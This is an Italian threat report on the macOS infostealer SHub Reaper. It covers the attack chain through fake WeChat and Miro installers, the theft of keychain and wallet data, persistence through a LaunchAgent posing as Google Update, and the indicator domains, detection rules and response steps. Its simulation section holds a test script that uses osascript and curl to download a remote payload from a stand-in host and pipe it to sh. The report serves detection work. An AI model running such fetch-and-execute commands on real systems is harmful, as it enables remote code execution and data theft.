SHub Reaper | Il ladro macOS inganna Apple, Google e Microsoft in una singola catena di attacco
Segui 
Detection stack
- AIDR
- Alert
- ETL
- Query
Riepilogo
Il report analizza una nuova variante di infostealer per macOS chiamata SHub Reaper, che utilizza installatori falsi di WeChat e Miro per consegnare un payload AppleScript malevolo attraverso un dominio Microsoft tematico con errori di battitura. Una volta avviato in Script Editor, il payload raccoglie dati del browser, file del portafoglio di criptovalute e informazioni sul portachiavi, quindi esfiltra i contenuti rubati come archivi ZIP segmentati. Il malware altera anche i file del portafoglio e stabilisce la persistenza attraverso un LaunchAgent mascherato da aggiornamento software di Google. La rilevazione raccomandata si concentra sull’esecuzione di AppleScript, sulla creazione sospetta di LaunchAgent e sul traffico in uscita verso l’infrastruttura di comando e controllo nota.
Indagine
SentinelOne ha monitorato l’intera catena di consegna multi-stadio, inclusi l’abuso dello schema applescript:// , la generazione dinamica del payload AppleScript e un modulo di acquisizione file che rispecchia il comportamento di furto di documenti visto in AMOS. I ricercatori hanno catturato il traffico di rete verso il dominio di comando e controllo hebsbsbzjsjshduxbs.xyz e endpoint correlati, insieme alla creazione di file temporanei sotto /tmp e un LaunchAgent posizionato nella directory Library dell’utente. L’indagine ha anche rivelato funzionalità di bot Telegram codificate durevolmente usate per la telemetria degli operatori.
Mitigazione
I difensori dovrebbero bloccare l’accesso ai domini con errori di battitura mlcrosoft.co.com, qq-0732gwh22.com, e mlroweb.com, e monitorare i LaunchAgent creati sotto i percorsi che imitano i componenti di aggiornamento di Google. Si dovrebbe usare una lista di applicazioni consentite per limitare l’esecuzione di AppleScript da fonti non attendibili, e dovrebbe essere applicata una verifica rigorosa della firma del codice. Le rilevazioni di rete dovrebbero anche avvisare sulla comunicazione con il dominio di comando e controllo identificato e sui suoi percorsi API noti.
Risposta
Se viene rilevata attività di SHub Reaper, isolare immediatamente l’endpoint interessato, terminare eventuali processi sospetti di AppleScript o LaunchAgent, e rimuovere i file malevoli da /tmp e dalla Libreria utente. Gli investigatori dovrebbero quindi eseguire una raccolta forense completa degli archivi dati del browser, delle directory dei portafogli e dei repository delle credenziali, seguita da reset delle credenziali dove si sospetta una compromissione. L’infrastruttura di comando e controllo identificata dovrebbe essere bloccata, e il team di risposta agli incidenti dovrebbe avviare una caccia alle minacce più ampia su tutta l’ambiente.
graph TB %% Definizioni delle classi classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef operator fill:#ff9900 %% Nodi – Fasi dell’attacco step_initial_access[“<b>Tecnica</b> – <b>T1659 Iniezione di Contenuto</b>: Siti web esca compromessi (falsi WeChat o Miro) ospitano URL applescript:// malevoli che distribuiscono il payload”] class step_initial_access action step_execution[“<b>Tecnica</b> – <b>T1027 File o Informazioni Offuscati</b>: AppleScript aperto in Script Editor esegue una chiamata curl nascosta codificata in base64 che decodifica ed esegue lo stager”] class step_execution action step_code_retrieval[“<b>Tecnica</b> – <b>T1505 Componente Software del Server</b>: AppleScript scarica il principale AppleScript malevolo da un server remoto”] class step_code_retrieval action step_credential_capture[“<b>Tecnica</b> – <b>T1056 Acquisizione di Input</b>: AppleScript richiede all’utente una password e raccoglie dati del Keychain”] class step_credential_capture action step_data_collection[“<b>Tecnica</b> – <b>T1074.001 Preparazione Locale dei Dati</b>: Filegrabber esegue la scansione di Desktop e Documents per individuare estensioni target e le prepara in /tmp/shub_<rand>”] class step_data_collection action step_archive[“<b>Tecnica</b> – <b>T1560.001 Archiviazione tramite Utility</b>: I file raccolti vengono compressi e suddivisi in blocchi da 70 MB”] class step_archive action step_exfiltration[“<b>Tecnica</b> – <b>T1011 Esfiltrazione tramite Altro Mezzo di Rete</b>: I blocchi vengono caricati tramite HTTPS sul server di comando e controllo”] class step_exfiltration action step_wallet_hijack[“<b>Tecniche</b> – <b>T1553.002 Firma del Codice</b> e <b>T1036.001 Mascheramento</b>: File app.asar malevoli sostituiscono binari wallet legittimi, utilizzando firme ad-hoc o non valide per aggirare Gatekeeper”] class step_wallet_hijack action step_persistence[“<b>Tecniche</b> – <b>T1037.002 Login Hook</b>, <b>T1176 Estensioni Software</b> e <b>T1574.007 Intercettazione del Percorso</b>: Directory falsa Google Software Update con un plist LaunchAgent (com.google.keystone.agent.plist) posizionata nel PATH per ottenere esecuzione persistente”] class step_persistence action step_backdoor[“<b>Tecnica</b> – <b>T1219 Strumenti di Accesso Remoto</b>: LaunchAgent esegue lo script GoogleUpdate ogni 60 s, invia beacon verso /api/bot/heartbeat e può eseguire comandi aggiuntivi”] class step_backdoor malware %% Nodi – Strumenti / Componenti tool_applescript[“<b>Strumento</b> – <b>Nome</b>: AppleScript<br/><b>Descrizione</b>: Script eseguito tramite Script Editor per decodificare e avviare il payload”] class tool_applescript tool tool_curl[“<b>Strumento</b> – <b>Nome</b>: curl<br/><b>Descrizione</b>: Utilizzato per scaricare AppleScript aggiuntivi e file di dati tramite HTTPS”] class tool_curl tool tool_launchagent[“<b>Strumento</b> – <b>Nome</b>: LaunchAgent<br/><b>Descrizione</b>: Meccanismo di persistenza a livello utente di macOS definito tramite un plist”] class tool_launchagent tool malware_stager[“<b>Malware</b> – <b>Nome</b>: Stager<br/><b>Descrizione</b>: Piccolo loader che recupera il payload principale AppleScript”] class malware_stager malware %% Archi – Flusso step_initial_access –>|porta a| step_execution step_execution –>|usa| tool_applescript step_execution –>|esegue| malware_stager malware_stager –>|scarica tramite| tool_curl malware_stager –>|attiva| step_code_retrieval step_code_retrieval –>|usa| tool_curl step_code_retrieval –>|abilita| step_credential_capture step_credential_capture –>|raccoglie| step_data_collection step_data_collection –>|prepara file per| step_archive step_archive –>|crea blocchi per| step_exfiltration step_exfiltration –>|consegna a| step_wallet_hijack step_wallet_hijack –>|modifica| step_persistence step_persistence –>|installa| tool_launchagent tool_launchagent –>|fornisce| step_backdoor step_backdoor –>|agisce come| malware_stager %% Assegnazioni delle classi class step_initial_access,step_execution,step_code_retrieval,step_credential_capture,step_data_collection,step_archive,step_exfiltration,step_wallet_hijack,step_persistence,step_backdoor action class tool_applescript,tool_curl,tool_launchagent tool class malware_stager,step_backdoor malware
Flusso di Attacco
Rilevazioni
Tentativo di Comunicazione con Domini IP tramite dns
Visualizza
Firmatario Forzato di Bundle di Applicazioni Modificate (via cmdline)
Visualizza
Utilità di Archivio macOS Puntando a una Directory Sospetta (via cmdline)
Visualizza
Tentativo Sospetto di Esecuzione di Curl [MacOS] (via cmdline)
Visualizza
Archivio Creato nella Cartella Temporanea di macOS (via file_event)
Visualizza
Possibile Manipolazione di Stringhe Codificate in Base64 (via cmdline)
Visualizza
IOC (HashSha256) per rilevare: SHub Reaper | macOS Stealer Che Parodia Apple, Google e Microsoft in una Singola Catena di Attacco
Visualizza
IOC (HashMd5) per rilevare: SHub Reaper | macOS Stealer Che Parodia Apple, Google e Microsoft in una Singola Catena di Attacco
Visualizza
Rilevazione della Catena di Infezione SHub Reaper Usando Domini con Errori di Battitura e C2 [Webserver]
Visualizza
Rilevamento dell’Esecuzione di Malware SHub Reaper tramite AppleScript e Curl [Creazione di Processi Linux]
Visualizza
Esecuzione della Simulazione
Prerequisito: Il Controllo Prevolo della Telemetria e Base deve essere stato completato con successo.
Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrativa DEVONO riflettere direttamente i TTP identificati e mirare a generare la telemetria esatta attesa dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errate.
-
Narrazione dell’Attacco e Comandi:
L’attaccante crea una stringa concisa che utilizzaosascriptper eseguire un comando shell. All’interno dell’AppleScript,do shell scripteseguecurlper scaricare uno script shell remoto (payload.sh) e lo indirizza direttamente ashper l’esecuzione. Poiché l’intera catena è incorporata in una singola invocazione AppleScript, macOS registra un singolo eventoprocess_creationil cui command line contiene entrambiosascriptandcurl, soddisfacendo la regola di rilevamento. -
Script di Test di Regressione:
#!/bin/bash # # Simula l'esecuzione di SHub Reaper su macOS # Genera un singolo evento di creazione processo contenente sia 'osascript' che 'curl' # MALICIOUS_URL="https://malicious.example.com/payload.sh" # Una stringa: osascript esegue un comando shell che scarica il payload ed esegue osascript -e "do shell script "curl -s ${MALICIOUS_URL} | sh"" -
Comandi di Pulizia:
#!/bin/bash # # Pulisce eventuali artefatti creati dalla simulazione. # Il payload funziona in memoria e non scrive file, ma ci assicuriamo che non ci siano processi rimanenti. # # Termina eventuali processi 'sh' rimasti avviati dal test (da usare con cautela su sistemi di produzione) pkill -f "sh -c curl -s https://malicious.example.com/payload.sh"